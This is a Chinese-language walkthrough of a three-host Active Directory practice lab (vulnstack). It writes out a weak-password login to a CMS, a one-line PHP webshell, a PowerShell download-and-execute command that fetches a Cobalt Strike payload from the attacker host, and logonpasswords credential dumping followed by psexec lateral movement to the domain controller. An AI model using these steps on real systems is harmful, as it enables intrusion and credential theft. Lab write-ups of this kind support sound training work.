环境
此实战靶场共 3 台主机,Win7 作为 Web 服务器,是打入此实战靶场的第一个目标和 入手点,Win2K3 为内网域成员主机,WinSever 2008 R2 为内网域控主机。
下载地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
环境调试
网卡桥接
主机 | 网卡 | IP |
---|---|---|
win7(web服务器) | 1.VM2 2.NAT | 192.168.52.143 and 192.168.8.142 |
win2003(内网域成员) | 1.VM2 | 192.168.52.141 |
win2008(内网域控) | 1.VM2 | 192.168.52.138 |
kail(攻击方) | 1.NAT | 192.168.8.131 |
win7:
win2003:
win2008
kali:
连通性验证
靶机初始密码hongrisec@2019 本地已经改成123.com
win7与所有主机均可通信
2003和2008互通
kali只能与win7ping通
环境调试
win7开启phpstudy
访问成功
信息收集
namp端口扫描
nmap -sS -p- 192.168.8.142
80主页是phpstudy探针,查看后并无实际价值
网站后台扫描
下载beifen.rar
推测存在yxcms…没扫出来估计是字典不行吧
漏洞利用
web漏洞利用
弱口令
一个非常明显的弱口令
admin 123456成功登录后台
上传一句话木马
进入前台模板管理写入一句话木马
通过之前下载的beifen文件可知前台页面路径
http://192.168.8.142/yxcms/protected/apps/default/view/default/muma.php
蚁剑连接
cs上线
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.131:80/a'))"
生成监听器
生成Scripted Web Delivery
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.131:8080/a'))"
复制命令,蚁剑shell执行
cs上线win7,上线会慢一点,上线后更改sleep时间
内网主机探测
shell ipconfig发现存在内网网段192.168.52.0/24
portscan 192.168.52.0-192.168.52.255 1-1024,3389,5000-6000 arp 1024
发现192.168.52.143 192.168.52.141 192.168.52.138
域内信息收集
域主机探测
net computers
dc探测
net dclist
导出webserver主机密码
logonpasswords
新建smb监听器
dc上线
目标–psexec